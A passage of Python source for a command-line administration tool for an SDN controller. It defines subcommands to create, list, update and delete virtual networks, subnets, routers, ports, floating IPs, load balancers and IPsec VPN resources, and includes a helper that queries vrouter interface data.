'show': 'READ',\n 'list': 'READALL',\n 'create': 'CREATE',\n 'delete': 'DELETE',\n 'update': 'UPDATE',\n 'insert': 'INSERT_RULE',\n 'remove': 'REMOVE_RULE',\n }\n\nfeatures = {\n 'net': 'Virtual Network',\n 'subnet': 'Subnet',\n 'router': 'Logical Router',\n 'prouter': 'Physical Router',\n 'port': 'Virtual Machine Interface',\n 'lb': 'Loadbalancer',\n 'vpn': 'IpSec VPN',\n 'fw': 'Firewall',\n 'qos': 'Qos',\n 'sg': 'Security Group',\n 'floatingip': 'Floating IP',\n 'provider': 'Public Network Provider',\n 'nodes': 'SDN Nodes',\n 'node': 'SDN Nodes info',\n 'tag': 'Tag',\n 'address-group': 'Address Group',\n 'service-group': 'Service Group',\n 'seg-fw': 'Segment Firewall',\n 'ipam': 'IP Address Management',\n}\n\ndebug = False\ndef DEBUG(*msg):\n if debug:\n print(*msg)\n\ndef debug_out(*msg):\n #enable = True\n enable = False\n if enable:\n print(*msg)\n\ndisable_out = False\ndef out(*msg):\n if not disable_out:\n print(*msg)\n\noutput_format = 'table'\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-f', '--file', help='Read from Json file')\n parser.add_argument('--host', help='Host to get token from')\n parser.add_argument('--token', action='store_true', help='Get token only')\n parser.add_argument('--password', help='Password to login host')\n parser.add_argument('--debug', action='store_true', help='Output curl command for each request')\n parser.add_argument('-g', '--gen-auth', action='store_true', help='Generate authenticate file')\n parser.add_argument('-i', '--interface', metavar='HOST', nargs='+', help='Get vrouter interface in the host')\n parser.add_argument('--netns', action='store_true', help='Show namespace VM')\n parser.add_argument('--no-output', action='store_true', help='Don not print result')\n parser.add_argument('--json', action='store_true', help='Print result with json format')\n def cmd_common(args):\n debug_out('cmd_common: ', args)\n if args.token:\n config = pasrse_config_file()\n api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n token = api.get_token()\n out(token)\n return\n if args.interface:\n for ip in args.interface:\n vr_interface(ip, args.netns)\n return\n if args.gen_auth:\n auth_host = args.host if args.host else '127.0.0.1'\n password = args.password if args.password else 'ArcherAdmin@123'\n path = os.path.dirname(os.path.abspath(__file__))\n auth_file = path + '/auth.json'\n example_file = path + '/example.json'\n if os.path.exists(auth_file):\n print('File already exist')\n return\n with open(auth_file, 'w') as f:\n f.write('#support line comment\\n')\n f.write(json.dumps({\n 'user': 'ArcherAdmin',\n 'password': password,\n 'project': 'ArcherAdmin',\n 'auth_host': auth_host,\n 'auth_port': '6000'\n }, indent=0))\n with open(example_file, 'w') as ef:\n text = []\n text.append('{')\n text.append('#\"user\": \"ArcherAdmin\",')\n text.append('#\"password\": \"%s\",' % password)\n text.append('#\"project\": \"ArcherAdmin\",')\n text.append('#\"auth_host\": \"%s\",' % auth_host)\n text.append('\"host\": \"%s\",' % auth_host)\n text.append('\"port\": \"8082\",')\n text.append('\"api\": \"/\",')\n text.append('\"method\": \"get\",')\n text.append('\"body\":')\n text.append('{')\n text.append('}')\n text.append('}')\n ef.write('\\n'.join(text))\n return\n if not args.file:\n parser.print_usage()\n return\n config = pasrse_config_file(args.file)\n api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n if 'header' in config:\n api.add_header(config['header'])\n url = api.encode_url(host=config['host'], port=config['port'], uri=config['api'])\n _, result = api.req(config['method'], url, config['body'])\n out(json.dumps(result, indent=4))\n if isinstance(result, list):\n print('Total resources: %s' % len(result))\n\n parser.set_defaults(func=cmd_common)\n subparsers = parser.add_subparsers()\n for feature in sorted(features.keys()):\n p = subparsers.add_parser(feature, argument_default=argparse.SUPPRESS, help=features[feature])\n ft = feature.replace('-', '_')\n if 'parser_%s' % (ft) in globals():\n globals()['parser_%s' % (ft)](p)\n args = parser.parse_args()\n if args.debug:\n global debug\n debug = True\n if args.json:\n global output_format\n output_format = 'json'\n if args.no_output:\n global disable_out\n disable_out = True\n debug_out('cmd: ', args)\n args.func(args)\n\ndef vr_interface(vrouter_ip, show_ns=False):\n import xml.etree.ElementTree as ET\n from prettytable import PrettyTable\n\n print('VRouter: ', vrouter_ip)\n vm_info = PrettyTable()\n vm_info.field_names = [\"VRouter\", \"VM Name\", \"Intf Name\", \"Intf IP\", \"MetaData IP\", \"VN\", \"FIP\"]\n\n res = requests.get(url=f'http://{vrouter_ip}:8085/Snh_VrouterInfoReq')\n if res.status_code != 200:\n print('error: host is not reachable')\n return\n root = ET.fromstring(res.text)\n vrouter_name = root.find('display_name').text\n compute_name = vrouter_name\n\n res = requests.get(url=f'http://{vrouter_ip}:8085/Snh_ItfReq')\n if res.status_code != 200:\n print('error: host is not reachable')\n return\n res.encoding='utf8'\n root = ET.fromstring(res.text)\n\n for interface in root.iter('ItfSandeshData'):\n intf_name = interface.find('name').text\n vm_name = interface.find('vm_name').text\n if not show_ns and (vm_name is None or vm_name.startswith('NetNS-')):\n continue\n ip_addr = interface.find('ip_addr').text\n mdata_ip_addr = interface.find('mdata_ip_addr').text\n vn = interface.find('vn_name').text\n if vn:\n vn = vn.split(':')[-1]\n fip = None\n fip_e = interface.find('fip_list')\n for fip_list in fip_e.iter('FloatingIpSandeshList'):\n fip = fip_list.find('ip_addr').text\n\n if vm_name is not None:\n vm_info.add_row([compute_name, vm_name, intf_name, ip_addr, mdata_ip_addr, vn, fip])\n print(vm_info)\n\ndef pair_check(sep, value):\n k,o,v= value.partition(sep)\n if not k or not o or not v:\n raise ValueError()\n return value\n\ndef kv(value):\n return pair_check('=', value)\n\ndef RANGE(value):\n return pair_check(':', value)\n\ndef RANGE2(value):\n return pair_check('-', value)\n\ndef BOOL(value):\n if value.lower() in ['true', 'yes']:\n return True\n if value.lower() in ['false', 'no']:\n return False\n raise ValueError()\n\nclass parser_base():\n def __init__(self, parser):\n self.oper = 'list'\n self.res = None\n self.action = None\n\n self.parser = parser\n self.operparser = parser.add_subparsers()\n self.create_parser = self.operparser.add_parser('create', argument_default=argparse.SUPPRESS, help='Create a resource')\n self.create_parser.add_argument('--oper', default='create', help=argparse.SUPPRESS)\n self.create_parser.add_argument('name', metavar='NAME', help='Name or ID to be created')\n self.create_parser.add_argument('--id', help='Resource ID to be created')\n self.create_parser.add_argument('--attr', type=json.loads,\n help='Add additional attribution to a resource')\n self.create_parser.add_argument('--shared', action='store_true', help='Shared resource')\n self.create_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n self.delete_parser = self.operparser.add_parser('delete', help='Delete a resource')\n self.delete_parser.add_argument('--oper', default='delete', help=argparse.SUPPRESS)\n self.delete_parser.add_argument('name', metavar='NAME', help='Name or ID to be deleted')\n self.delete_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n self.update_parser = self.operparser.add_parser('update', argument_default=argparse.SUPPRESS, help='Update a resource')\n self.update_parser.add_argument('--oper', default='update', help=argparse.SUPPRESS)\n self.update_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.update_parser.add_argument('--attr', type=json.loads,\n help='Json to be add additional attribution to a resource')\n self.update_parser.add_argument('--shared', type=BOOL, help='Shared resource')\n self.update_parser.add_argument('--enabled', type=BOOL)\n self.update_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n self.show_parser = self.operparser.add_parser('show', argument_default=argparse.SUPPRESS, help='Show a resource')\n self.show_parser.add_argument('--oper', default='show', help=argparse.SUPPRESS)\n self.show_parser.add_argument('name', metavar='NAME', help='Name or ID to be displayed')\n self.show_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n self.list_parser = self.operparser.add_parser('list', argument_default=argparse.SUPPRESS, help='Show all resources of this type')\n self.list_parser.add_argument('--oper', default='list', help=argparse.SUPPRESS)\n self.list_parser.add_argument('--id', nargs='+', help='Filter by id')\n self.list_parser.add_argument('--name', nargs='+', help='Filter by name')\n self.list_parser.add_argument('--filters', type=json.loads)\n self.list_parser.add_argument('--start', help='Pagition: uuid to be start, leave empty in first require')\n self.list_parser.add_argument('--count', help='Pagition: how many items should be return')\n self.list_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n self.list_parser.set_defaults(func=self.cmd_list)\n\n def cmd_base(self, args):\n if 'shared' in args:\n self.res.shared = args.shared\n if 'enabled' in args:\n self.res.enabled = args.enabled\n if 'oper' in args:\n self.res.oper = OPER[args.oper]\n if 'name' not in args:\n return\n try:\n uuid.UUID(args.name)\n self.res.id = args.name\n except ValueError as e:\n self.res.name = args.name\n if 'id' in args:\n self.res.id = args.id\n self.res.name = args.name\n if 'no_admin' in args:\n self.res.context['is_admin'] = False\n if 'attr' in args:\n self.res.resource.update(args.attr)\n #for attr in args.attr:\n # k,_,v = attr.partition('=')\n # self.res.resource[k] = v\n\n def cmd_list(self, args):\n debug_out('cmd_list: ', args)\n self.res.oper = OPER[args.oper]\n if 'no_admin' in args:\n self.res.context['is_admin'] = False\n if 'net' in args:\n net_id = [self.name_to_id(VirtualNetwork(), net) for net in args.net]\n self.res.filters['network_id'] = net_id\n if 'prefix' in args:\n self.res.filters['prefix'] = args.prefix\n if 'name' in args:\n self.res.filters['name'] = args.name\n if 'id' in args:\n self.res.filters['id'] = args.id\n if 'mac' in args:\n self.res.filters['mac_address'] = args.mac\n if 'status' in args:\n self.res.filters['status'] = args.status\n if 'device' in args:\n self.res.filters['device_id'] = args.device\n if 'filters' in args:\n self.res.filters = args.filters\n if 'start' in args:\n self.res.filters['marker'] = args.start\n if 'count' in args:\n self.res.filters['limit'] = args.count\n self.cmd_action()\n\n def cmd_action(self, res=None):\n action_res = self.res if not res else res\n if self.action:\n self.action.set_res(action_res)\n else:\n self.action = ResourceAction(action_res)\n self.action.post()\n\n def name_to_id(self, res, name):\n try:\n return str(uuid.UUID(name))\n except ValueError as e:\n pass\n if self.action:\n self.action.set_res(res)\n else:\n self.action = ResourceAction(res)\n return self.action.name_to_id(name)\n\nclass parser_net(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = VirtualNetwork()\n group = self.create_parser.add_mutually_exclusive_group()\n group.add_argument('--vlan', default=argparse.SUPPRESS, help='VLAN ID for public network')\n group.add_argument('--vxlan', default=argparse.SUPPRESS, help='VXLAN ID for private network')\n self.create_parser.add_argument('--tag', nargs='*', help='Tag')\n self.create_parser.add_argument('--forward', choices=['l2', 'l3', 'l2_l3'], help='Forwarding mode')\n self.create_parser.add_argument('--mode', choices=['flat-subnet-only', 'user-defined-subnet-preferred',\n 'flat-subnet-preferred', 'user-defined-subnet-only'],\n help='Address allocation mode')\n parser.set_defaults(func=self.cmd_net)\n\n def cmd_net(self, args):\n debug_out('cmd_net: ', args)\n self.cmd_base(args)\n if 'vlan' in args:\n self.res.external = True\n self.res.segment = args.vlan\n if 'vxlan' in args:\n self.res.external = False\n self.res.segment = args.vxlan\n if 'tag' in args:\n self.res.resource['tag'] = args.tag\n if 'mode' in args:\n self.res.resource['address_allocation_mode'] = args.mode\n if 'forward' in args:\n self.res.resource['forwarding_mode'] = args.forward\n self.cmd_action()\n\nclass parser_ipam(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = IpAM()\n self.create_parser.add_argument('--method', choices=['flat-subnet', 'user-defined-subnet'], help='Method to create subnet')\n parser.set_defaults(func=self.cmd_ipam)\n\n def cmd_ipam(self, args):\n debug_out('cmd_ipam: ', args)\n self.cmd_base(args)\n if 'method' in args:\n self.res.resource['ipam_subnet_method'] = args.method\n self.cmd_action()\n\nclass parser_subnet(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Subnet()\n self.create_parser.add_argument('-n', '--net', required=True, help='Network that subnet belong to')\n self.create_parser.add_argument('-p', '--prefix', required=True, help='Prefix of a ubnet')\n self.create_parser.add_argument('--no-dhcp', action='store_true', help='Disable DHCP')\n self.create_parser.add_argument('--no-gateway', action='store_true', help='Disable gateway')\n self.create_parser.add_argument('--pools', type=RANGE2, metavar='START-END', nargs='+',\n help='Allocation pools')\n self.create_parser.add_argument('--ipam', help='IPAM to be used')\n\n self.list_parser.add_argument('--net', nargs='+', help='Filter by network')\n self.list_parser.add_argument('--prefix', nargs='+', help='Filter by prefix')\n parser.set_defaults(func=self.cmd_subnet)\n\n def cmd_subnet(self, args):\n debug_out('cmd_subnet: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n if 'prefix' in args:\n self.res.cidr = args.prefix\n if 'no_dhcp' in args:\n self.res.dhcp = '0.0.0.0'\n if 'no_gateway' in args:\n self.res.gateway = '0.0.0.0'\n if 'pools' in args:\n for pool in args.pools:\n pool = pool.split('-')\n self.res.add_alloc_pool(pool[0], pool[1])\n if 'ipam' in args:\n self.res.resource['ipam_fq_name'] = ['default-domain', 'ArcherAdmin', args.ipam]\n self.cmd_action()\n\nclass parser_router(parser_base):\n def fixed_ip(value):\n args = value.split(':')\n if len(args) > 2:\n raise ValueError()\n return {'ip_address': args[0], 'subnet_id': args[1]}\n\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Router()\n gw_parser = self.create_parser.add_subparsers()\n gw = gw_parser.add_parser('gateway', argument_default=argparse.SUPPRESS)\n gw.add_argument('-n', '--net', help='Network of gateway')\n gw.add_argument('-i', '--fixed-ip', help='Fixed IP address of gateway')\n gw.set_defaults(func=self.cmd_gateway)\n\n subparser = self.update_parser.add_subparsers()\n gw = subparser.add_parser('gateway', argument_default=argparse.SUPPRESS)\n gw.add_argument('-r', '--remove', action='store_true', help='Remove gateway')\n gw.add_argument('-n', '--net', help='Network of gateway')\n gw.add_argument('-i', '--fixed-ip', metavar='IP:SUBNET-ID', type=self.fixed_ip, help='Fixed IP address of gateway')\n gw.set_defaults(func=self.cmd_gateway)\n pf = subparser.add_parser('port-forward', argument_default=argparse.SUPPRESS)\n pf.add_argument('-p', '--protocol', required=True, help='Protocol used in port forwarding')\n pf.add_argument('-s', '--service-port', required=True, help = 'Service port exposed to the public')\n pf.add_argument('--vm-ip', required=True, help='IP of VM in private network')\n pf.add_argument('--vm-port', required=True, help='VM port to supply service')\n pf.set_defaults(func=self.cmd_portforward)\n\n subnet_g = self.update_parser.add_mutually_exclusive_group()\n subnet_g.add_argument('-s', '--subnet', help='Private subnet')\n subnet_g.add_argument('-S', '--no-subnet', help='Remove private subnet')\n self.update_parser.add_argument('-P', '--no-port-forward', help='Remove port-forwarding')\n\n self.show_parser.add_argument('-p', '--port', action='store_true', help='Display ports of this router')\n self.show_parser.set_defaults(func=self.cmd_show)\n\n parser.set_defaults(func=self.cmd_router)\n\n def cmd_router(self, args):\n debug_out('cmd_router: ', args)\n self.cmd_base(args)\n if 'subnet' in args:\n self.res.oper = 'ADDINTERFACE'\n self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n self.cmd_action()\n if 'no_subnet' in args:\n self.res.oper = 'DELINTERFACE'\n self.res.subnet = self.name_to_id(Subnet(), args.no_subnet)\n self.cmd_action()\n if 'no_port_forward' in args:\n self.res.portforward = None\n self.cmd_action()\n self.res.oper = OPER[args.oper]\n self.cmd_action()\n\n def cmd_show(self, args):\n debug_out('cmd_show: ', args)\n if 'port' in args:\n res = Port()\n res.filters['device_id'] = [self.name_to_id(Router(), args.name)]\n self.cmd_action(res)\n print('**** Router %s Information ****' % args.name)\n self.cmd_router(args)\n\n def cmd_gateway(self, args):\n debug_out('cmd_gateway: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n if 'fixed_ip' in args:\n self.res.fixed_ip = args.fixed_ip\n if 'remove' in args:\n self.res.gateway = None\n self.cmd_router(args)\n\n def cmd_portforward(self, args):\n debug_out('cmd_portfoward: ', args)\n pf = self.res.PortForwording(args.protocol, args.vm_ip, args.vm_port, args.service_port)\n self.cmd_base(args)\n self.res.portforward = pf\n self.cmd_router(args)\n\nclass parser_port(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Port()\n self.create_parser.add_argument('-n', '--net', required=True, help='Network the port should be created')\n self.create_parser.add_argument('-s', '--subnet', help='Subnet the port should be created')\n self.create_parser.add_argument('--ip', help='Fixed ip address should be allocated')\n self.create_parser.add_argument('--tag', nargs='*', help='Tag')\n\n self.update_parser.add_argument('-q', '--qos', metavar='Qos-ID', nargs='*', help='Only ingress and egress Qos needed, remove Qos if zero input')\n self.update_parser.add_argument('--tag', nargs='*', help='Tag')\n\n subparser = self.update_parser.add_subparsers()\n mr = subparser.add_parser('mirror', argument_default=argparse.SUPPRESS)\n mr.add_argument('-n', '--mirror-name', help='Analyzer name')\n mr.add_argument('--net', help='Mirror network id')\n mr.add_argument('-i', '--ip', help='Analyzer IP address')\n mr.add_argument('-m', '--mac', help='Analyzer mac address')\n mr.set_defaults(func=self.cmd_mirror)\n\n self.list_parser.add_argument('--net', nargs='+', help='Filter by network')\n self.list_parser.add_argument('--mac', nargs='+', help='Filter by mac address')\n self.list_parser.add_argument('--status', nargs='+', help='Filter by status')\n self.list_parser.add_argument('--device', nargs='+', help='Filter by device id')\n self.list_parser.set_defaults(func=self.cmd_list)\n\n parser.set_defaults(func=self.cmd_port)\n\n def cmd_port(self, args):\n debug_out('cmd_port: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n if 'subnet' in args:\n self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n if 'ip' in args:\n self.res.ip = args.ip\n if 'qos' in args:\n self.res.qos = args.qos\n if 'tag' in args:\n self.res.resource['tags'] = args.tag\n self.cmd_action()\n\n def cmd_mirror(self, args):\n debug_out('cmd_mirror: ', args)\n self.cmd_base(args)\n self.res.resource['interface_mirror'] = {}\n res = self.res.resource['interface_mirror']\n if 'net' in args:\n res['network_id'] = self.name_to_id(VirtualNetwork(), args.net)\n if 'ip' in args:\n res['analyzer_ip_address'] = args.ip\n if 'mac' in args:\n res['analyzer_mac_address'] = args.mac\n if 'mirror_name' in args:\n res['analyzer_name'] = args.mirror_name\n self.cmd_action()\n\nclass parser_floatingip(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = FloatingIP()\n self.create_parser.add_argument('-n', '--net', required=True, help='Network the floating ip allocated from')\n self.create_parser.add_argument('-s', '--subnet', help='Subnet the floating ip allocated from')\n self.create_parser.add_argument('--ip', help='Floating ip address should be allocated')\n self.create_parser.add_argument('--fixed-ip', help='Fixed ip address associated with floating ip')\n self.create_parser.add_argument('-p', '--port', help='Port associated with floating ip')\n self.update_parser.add_argument('-p', '--port', nargs='?', help='Port associated with floating ip, remove if no value')\n parser.set_defaults(func=self.cmd_floatingip)\n\n def cmd_floatingip(self, args):\n debug_out('cmd_floatingip: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n if 'subnet' in args:\n self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n if 'ip' in args:\n self.res.ip = args.ip\n if 'fixed_ip' in args:\n self.res.fixed_ip = args.fixed_ip\n if 'port' in args:\n if args.port:\n self.res.port = self.name_to_id(Port(), args.port)\n else:\n self.res.port = None\n self.cmd_action()\n\nclass parser_lb(parser_base):\n def __init__(self, parser):\n self.action = None\n self.parser = parser\n parser.add_argument('--config', action='store_true', help='Loadbalancer')\n subparser = self.parser.add_subparsers()\n lb = subparser.add_parser('loadbalancer', aliases=['lb'], help='Loadbalancer')\n parser_loadbalancer(lb)\n listener = subparser.add_parser('listener', help='Listener for loadbalancer')\n parser_listener(listener)\n pool = subparser.add_parser('pool', help='Pool for loadbalancer')\n parser_pool(pool)\n member = subparser.add_parser('member', help='Member of pool')\n parser_member(member)\n monitor = subparser.add_parser('monitor', help='Health monitor for each pool')\n parser_lbmonitor(monitor)\n parser.set_defaults(func=self.cmd_lb)\n\n def cmd_lb(self, args):\n debug_out('cmd_lb: ', args)\n if 'config' in args:\n self.res = LoadBalancer()\n self.res.url = self.res.url.replace('loadbalancer', 'loadbalancer_config')\n self.cmd_action()\n else:\n self.parser.print_usage()\n\nclass parser_loadbalancer(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = LoadBalancer()\n self.create_parser.add_argument('-s', '--subnet', required=True, help='VIP subnet')\n self.create_parser.add_argument('-i', '--vip', help='IP address of VIP')\n self.create_parser.add_argument('-p', '--provider', default='arsdn',\n choices=['arsdn', 'octavia'], help='Provider of LB')\n self.create_parser.add_argument('--listeners', metavar='LISTENERID', nargs='+', help='Listener ID')\n self.create_parser.add_argument('--pools', metavar='POOLID', nargs='+', help='Pool ID')\n self.create_parser.add_argument('-c', '--cluster', help='Cluster IP')\n self.update_parser.add_argument('--pool', help='Pool ID')\n\n parser.set_defaults(func=self.cmd_loadbalancer)\n\n def cmd_loadbalancer(self, args):\n debug_out('cmd_loadbalancer: ', args)\n self.cmd_base(args)\n if 'subnet' in args:\n self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n if 'vip' in args:\n self.res.vip = args.vip\n if 'provider' in args:\n self.res.provider = args.provider\n if 'cluster' in args:\n self.res.cluster = args.cluster\n if 'listerners' in args:\n self.res.listeners = [self.name_to_id(LoadBalanceListener(), l) for l in args.listeners]\n if 'pools' in args:\n self.res.pools = [self.name_to_id(LoadBalancePool(), p) for p in args.pools]\n self.cmd_action()\n\nclass parser_listener(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = LoadBalanceListener()\n self.create_parser.add_argument('--lb', required=True, help='LoadBalancer for listener')\n self.create_parser.add_argument('--port', required=True, help='Protocol port to listen')\n self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol to listen',\n choices=['udp', 'tcp', 'http', 'https', 'terminated_https'])\n self.create_parser.add_argument('-c', '--cert', help='Default cert ref for https')\n self.create_parser.add_argument('--certs', nargs='+', help='Cert refs for https')\n parser.set_defaults(func=self.cmd_listener)\n\n def cmd_listener(self, args):\n debug_out('cmd_listener: ', args)\n self.cmd_base(args)\n if 'port' in args:\n self.res.port = args.port\n if 'protocol' in args:\n self.res.protocol = args.protocol.upper()\n if 'lb' in args:\n self.res.lb= self.name_to_id(LoadBalancer(), args.lb)\n if 'cert' in args:\n self.res.resource['default_tls_container_ref'] = args.cert\n if 'certs' in args:\n self.res.resource['sni_container_refs'] = args.certs\n self.cmd_action()\n\nclass parser_pool(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = LoadBalancePool()\n self.create_parser.add_argument('--lb', help='LoadBalancer for pool')\n self.create_parser.add_argument('-l', '--listener', help='Listener for pool')\n self.create_parser.add_argument('-a', '--algorithm', default='round_robin', help='Protocol port to listen',\n choices=['round_robin', 'least_connections', 'source_ip'])\n self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol to listen',\n choices=['udp', 'tcp', 'http', 'https', 'terminated_https'])\n self.create_parser.set_defaults(func=self.cmd_pool_create)\n parser.set_defaults(func=self.cmd_pool)\n\n def cmd_pool_create(self, args):\n debug_out('cmd_pool_create: ', args)\n self.cmd_base(args)\n if 'algorithm' in args:\n self.res.algorithm = args.algorithm.upper()\n if 'protocol' in args:\n self.res.protocol = args.protocol.upper()\n if 'lb' in args:\n self.res.lb = self.name_to_id(LoadBalancer(), args.lb)\n if 'listener' in args:\n self.res.listener = self.name_to_id(LoadBalanceListener(), args.listener)\n if not self.res.lb and not self.res.listener:\n self.create_parser.error('the following arguments are required: --lb or -l/listener')\n self.cmd_action()\n\n def cmd_pool(self, args):\n debug_out('cmd_pool: ', args)\n self.cmd_base(args)\n self.cmd_action()\n\nclass parser_member(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = LoadBalanceMember()\n self.create_parser.add_argument('-s', '--subnet', required=True, help='Subnet the member belong to')\n self.create_parser.add_argument('--port', required=True, help='Service port')\n self.create_parser.add_argument('--ip', required=True, help='IP address of member')\n self.parser.add_argument('-p', '--pool', required=True, help='Pool the member belong to')\n\n parser.set_defaults(func=self.cmd_member)\n\n def cmd_member(self, args):\n debug_out('cmd_member: ', args)\n self.cmd_base(args)\n self.res.pool = self.name_to_id(LoadBalancePool(), args.pool)\n if 'port' in args:\n self.res.port = args.port\n if 'ip' in args:\n self.res.ip = args.ip\n if 'subnet' in args:\n self.res.subnet= self.name_to_id(Subnet(), args.subnet)\n self.cmd_action()\n def cmd_list(self, args):\n self.res.pool = self.name_to_id(LoadBalancePool(), args.pool)\n super().cmd_list(args)\n\nclass parser_lbmonitor(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = LoadBalanceHealthMonitor()\n self.create_parser.add_argument('-d', '--delay', required=True, help='Interval of monitor check')\n self.create_parser.add_argument('-t', '--timeout', required=True, help='Timeout for monitor')\n self.create_parser.add_argument('-m', '--max-retries', required=True, help='Max retries if timeout')\n self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol of listner',\n choices=['tcp', 'http', 'https'])\n self.parser.add_argument('-p', '--pool', required=True, help='Pool the member belong to')\n parser.set_defaults(func=self.cmd_lbmonitor)\n\n def cmd_lbmonitor(self, args):\n debug_out('cmd_lbmonitor: ', args)\n self.cmd_base(args)\n self.res.pool = args.pool\n if 'protocol' in args:\n self.res.protocol = args.protocol.upper()\n if 'delay' in args:\n self.res.delay = args.delay\n if 'timeout' in args:\n self.res.timeout = args.timeout\n if 'max_retries' in args:\n self.res.max_retries = args.max_retryies\n self.cmd_action()\n\nclass parser_vpn(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n ike = subparser.add_parser('ike', help='IKE policy')\n parser_ike(ike)\n ipsec = subparser.add_parser('ipsec', help='IpSec policy')\n parser_ipsec(ipsec)\n endpoint = subparser.add_parser('endpoint', help='VPN endpoint group')\n parser_endpoint(endpoint)\n service = subparser.add_parser('service', help='VPN service')\n parser_service(service)\n connection = subparser.add_parser('connection', help='IpSec connection')\n parser_connection(connection)\n p2s = subparser.add_parser('p2s', help='IpSec peer 2 site connection')\n parser_p2s(p2s)\n parser.set_defaults(func=self.cmd_vpn)\n\n def cmd_vpn(self, args):\n self.parser.print_usage()\n\nclass parser_ike(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = IkePolicy()\n self.create_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n self.create_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n self.create_parser.add_argument('-v', '--ike-version', help='IKE version', choices=['v1','v2'])\n\n self.update_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n self.update_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n self.update_parser.add_argument('-v', '--ike-version', help='IKE version', choices=['v1','v2'])\n parser.set_defaults(func=self.cmd_ike)\n\n def cmd_ike(self, args):\n debug_out('cmd_ike: ', args)\n self.cmd_base(args)\n if 'auth_algorithm' in args:\n self.res.auth_algorithm = args.auth_algorithm\n if 'encryption_algorithm' in args:\n self.res.encryption_algorithm = args.encryption_algorithm\n if 'ike_version' in args:\n self.res.ike_version = args.ike_version\n self.cmd_action()\n\nclass parser_ipsec(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = IpsecPolicy()\n self.create_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n self.create_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n self.create_parser.add_argument('-t', '--transform-protocol', choices=['ESP','AH','AH-ESP'])\n\n self.update_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n self.update_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n self.update_parser.add_argument('-t', '--transform-protocol', choices=['ESP','AH','AH-ESP'])\n parser.set_defaults(func=self.cmd_ipsec)\n\n def cmd_ipsec(self, args):\n debug_out('cmd_ipsec: ', args)\n self.cmd_base(args)\n if 'auth_algorithm' in args:\n self.res.auth_algorithm = args.auth_algorithm\n if 'encryption_algorithm' in args:\n self.res.encryption_algorithm = args.encryption_algorithm\n if 'transform_protocol' in args:\n self.res.transform_protocol = args.transform_protocol\n self.cmd_action()\n\nclass parser_endpoint(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = VpnEndpiointGroup()\n self.create_parser.add_argument('-e', '--endpoints', metavar='PREFIX', required=True,\n nargs='+', help='PREFIX list')\n self.create_parser.add_argument('-t', '--endpoint-type', required=True, choices=['local','remote'])\n parser.set_defaults(func=self.cmd_endpoint)\n\n def cmd_endpoint(self, args):\n debug_out('cmd_point: ', args)\n self.cmd_base(args)\n if 'endpoints' in args:\n self.res.endpoints = args.endpoints\n if 'endpoint_type' in args:\n self.res.endpoint_type = args.endpoint_type\n self.cmd_action()\n\nclass parser_service(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = VpnService()\n self.create_parser.add_argument('-r', '--router', required=True, help='Router VPN will associated')\n parser.set_defaults(func=self.cmd_service)\n\n def cmd_service(self, args):\n debug_out('cmd_servcie: ', args)\n self.cmd_base(args)\n if 'router' in args:\n self.res.router = self.name_to_id(Router(), args.router)\n self.cmd_action()\n\nclass parser_connection(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = VpnConnection()\n self.create_parser.add_argument('--ike', required=True, help='IKE policy')\n self.create_parser.add_argument('--ipsec', required=True, help='IpSec policy')\n self.create_parser.add_argument('-s', '--service', required=True, help='VPN service')\n self.create_parser.add_argument('--peer-ip', required=True, help='Peer gateway IP')\n self.create_parser.add_argument('--peer-id', required=True, help='Peer ID, usaully same as peer ip')\n self.create_parser.add_argument('--psk', required=True, 